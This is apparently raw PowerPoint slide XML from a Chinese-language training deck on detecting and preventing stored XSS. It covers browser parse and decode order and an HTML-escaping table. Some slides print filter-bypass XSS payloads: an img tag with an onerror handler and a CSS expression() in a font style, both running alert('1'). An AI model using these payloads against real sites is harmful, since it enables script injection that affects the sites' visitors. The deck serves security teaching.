          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符被过滤了，我们也可以用其它方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>knownsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=alert('1')&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过构造错误属性，让浏览器执行特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即使这种方式被防住，我们也可以使用自行构造事件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;font style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>TEST:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('1'));"&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>除了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>font, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>还有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等标签也可以利用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20756576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如何检测存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>insertAjacentHTML</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符被过滤了，我们也可以用其它方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>knownsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=alert('1')&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过构造错误属性，让浏览器执行特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即使这种方式被防住，我们也可以使用自行构造事件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;font style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>TEST:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('1'));"&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>除了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>font, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>还有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等标签也可以利用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4813840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如何防范存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>整个构成如下：</a:t>
            </a:r>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432" y="1412776"/>
            <a:ext cx="1152128" cy="1152128"/>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7688" y="1445434"/>
            <a:ext cx="1349716" cy="1119470"/>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2064" y="1452736"/>
            <a:ext cx="1219200" cy="1219200"/>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74607" y="2691183"/>
            <a:ext cx="1097857" cy="1097857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="燕尾形箭头 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135560" y="1700808"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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smtClean="0"/>
              <a:t>用户输入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="燕尾形箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746284" y="1700808"/>
            <a:ext cx="1781764" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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smtClean="0"/>
              <a:t>数据传递</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形标注 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8184232" y="1124744"/>
            <a:ext cx="1440160" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61551"/>
              <a:gd name="adj2" fmla="val 41796"/>
              <a:gd name="adj3" fmla="val 16667"/>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服务器解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>接收内容</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="燕尾形箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1759327">
            <a:off x="7918444" y="2212956"/>
            <a:ext cx="1236702" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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smtClean="0"/>
              <a:t>数据传递</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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9178" y="3693256"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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346" y="3553446"/>
            <a:ext cx="1152128" cy="1152128"/>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7688" y="3785799"/>
            <a:ext cx="1349716" cy="1119470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="燕尾形箭头 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120992" y="3933056"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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用户访问</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="燕尾形箭头 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743292" y="3553446"/>
            <a:ext cx="1784755" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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用户访问</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="燕尾形箭头 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19401895">
            <a:off x="7933198" y="3222800"/>
            <a:ext cx="1236702" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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请求数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="燕尾形箭头 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19401895" flipH="1">
            <a:off x="8230856" y="3828261"/>
            <a:ext cx="1186673" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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返回数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="燕尾形箭头 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4743291" y="4302856"/>
            <a:ext cx="1784755" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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返回数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="圆角矩形标注 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7888378" y="5073265"/>
            <a:ext cx="1440160" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62931"/>
              <a:gd name="adj2" fmla="val -59425"/>
              <a:gd name="adj3" fmla="val 16667"/>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解析数据库</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>返回内容</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="圆角矩形标注 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4193268" y="5052266"/>
            <a:ext cx="1440160" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62931"/>
              <a:gd name="adj2" fmla="val -59425"/>
              <a:gd name="adj3" fmla="val 16667"/>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浏览器解析数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="圆角矩形标注 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1718388" y="2519155"/>
            <a:ext cx="791004" cy="278207"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62931"/>
              <a:gd name="adj2" fmla="val -59425"/>
              <a:gd name="adj3" fmla="val 16667"/>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黑客</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2012252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如何防范存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（续）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浏览器解析顺序：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浏览器解码顺序：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1865292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如何防范存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第一是对用户输入的特殊字符进行转译</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中不可信字符串进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>amp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>"	&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA" altLang="zh-CN" dirty="0"/>
              <a:t>`	&amp;#x60;	</a:t>
